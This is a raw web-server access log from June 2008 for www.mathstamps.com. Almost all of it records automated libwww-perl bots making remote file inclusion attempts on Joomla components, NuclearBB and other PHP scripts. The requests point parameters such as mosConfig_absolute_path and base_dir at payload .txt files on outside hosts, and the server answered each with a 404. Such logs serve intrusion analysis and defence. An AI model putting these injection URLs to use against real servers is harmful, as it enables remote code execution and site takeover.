212.227.251.172 - - [08/Jun/2008:21:06:40 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.251.172 - - [08/Jun/2008:21:06:40 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.58.181.74 - - [08/Jun/2008:21:07:24 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.yourhong.com/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.181.74 - - [08/Jun/2008:21:07:25 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.yourhong.com/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.106.98.71 - - [08/Jun/2008:21:07:36 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.98.71 - - [08/Jun/2008:21:07:37 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.101.24 - - [08/Jun/2008:21:07:50 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.101.24 - - [08/Jun/2008:21:07:50 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
202.221.143.111 - - [08/Jun/2008:21:07:58 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
202.221.143.111 - - [08/Jun/2008:21:07:59 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
212.227.251.172 - - [08/Jun/2008:21:08:06 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
210.48.67.39 - - [08/Jun/2008:21:08:06 -0700] "GET /logs/access_080414.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.194.149.28 - - [08/Jun/2008:21:08:46 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.194.149.28 - - [08/Jun/2008:21:08:47 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
206.168.112.10 - - [08/Jun/2008:21:09:20 -0700] "GET /logs/access_080414.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.daviestattoo.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.mathstamps.com"
91.121.87.84 - - [08/Jun/2008:21:12:15 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
91.121.87.84 - - [08/Jun/2008:21:12:15 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:21:12:38 -0700] "GET /logs/access_080609.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:21:12:44 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
207.58.181.74 - - [08/Jun/2008:21:12:55 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://www.yourhong.com/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.181.74 - - [08/Jun/2008:21:12:57 -0700] "GET /logs/access_080421.log//joomla/index.php?option=com_restaurante&task=http://www.yourhong.com/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
213.194.149.28 - - [08/Jun/2008:21:13:57 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.194.149.28 - - [08/Jun/2008:21:14:29 -0700] "GET /logs/access.log//joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.218.234.146 - - [08/Jun/2008:21:14:30 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.218.234.146 - - [08/Jun/2008:21:14:30 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.218.234.146 - - [08/Jun/2008:21:14:30 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.218.234.146 - - [08/Jun/2008:21:14:30 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
213.194.149.28 - - [08/Jun/2008:21:14:32 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:21:14:33 -0700] "GET /logs/access_080512.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:21:14:33 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:21:14:33 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
160.99.12.231 - - [08/Jun/2008:21:14:41 -0700] "GET /logs//joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [08/Jun/2008:21:14:42 -0700] "GET //joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
213.194.149.215 - - [08/Jun/2008:21:14:55 -0700] "GET /logs/access.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
207.218.234.146 - - [08/Jun/2008:21:15:46 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.218.234.146 - - [08/Jun/2008:21:15:46 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.218.234.146 - - [08/Jun/2008:21:15:48 -0700] "GET /logs/access_080421.log//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.218.234.146 - - [08/Jun/2008:21:15:48 -0700] "GET /logs/access_080421.log//joomla/index.php?option=com_restaurante&task=http://www.linknetcrew.com/code/mc22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
91.121.87.84 - - [08/Jun/2008:21:16:58 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
160.99.12.231 - - [08/Jun/2008:21:17:01 -0700] "GET /logs/access_080519.log//joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
91.121.87.84 - - [08/Jun/2008:21:17:03 -0700] "GET /logs/access_080421.log//joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
160.99.12.231 - - [08/Jun/2008:21:17:13 -0700] "GET /logs/access_080421.log//joomla/index.php?option=com_restaurante&task=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.6.17.177 - - [08/Jun/2008:21:17:22 -0700] "GET /logs/access_080519.log HTTP/1.0" 200 5693247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
217.172.182.209 - - [08/Jun/2008:21:17:34 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
217.172.182.209 - - [08/Jun/2008:21:17:34 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
91.121.87.84 - - [08/Jun/2008:21:18:42 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
208.78.243.180 - - [08/Jun/2008:21:20:34 -0700] "GET /logs/access.log//convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.78.243.180 - - [08/Jun/2008:21:20:34 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
208.78.243.180 - - [08/Jun/2008:21:20:34 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:20:37 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:20:37 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:20:37 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
217.172.182.209 - - [08/Jun/2008:21:21:39 -0700] "GET /logs/access.log//convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
217.172.182.209 - - [08/Jun/2008:21:21:40 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
217.172.182.209 - - [08/Jun/2008:21:21:40 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
208.78.243.180 - - [08/Jun/2008:21:23:04 -0700] "GET /logs/access_080414.log//convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.172.182.209 - - [08/Jun/2008:21:23:40 -0700] "GET /logs/access_080414.log//convert/mvcw_conver.php?step=1&vwar_root=http://www.team-nds.de/includes/albid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:20 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:21 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:21 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:22 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:22 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:22 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:24 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:24 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:25 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:29 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:29 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:29 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:29 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:29 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:30 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:35 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:35 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:35 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:39 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:39 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:39 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:42 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:42 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:42 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:42 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:42 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:43 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:46 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:46 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
70.85.253.34 - - [08/Jun/2008:21:24:46 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:49 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:50 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.44.238.63 - - [08/Jun/2008:21:24:50 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.25.5.89 - - [08/Jun/2008:21:24:56 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.25.5.89 - - [08/Jun/2008:21:24:57 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.25.5.89 - - [08/Jun/2008:21:24:57 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:02 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:02 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:02 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:04 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:04 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:04 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:11 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:12 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:12 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:12 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:12 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.114.74 - - [08/Jun/2008:21:25:12 -0700] "GET /logs//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
64.128.80.17 - - [08/Jun/2008:21:25:13 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.128.80.17 - - [08/Jun/2008:21:25:13 -0700] "GET /logs/access_080414.log//path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.128.80.17 - - [08/Jun/2008:21:25:13 -0700] "GET //path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://www.sisred.com/tmp/php-ses/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
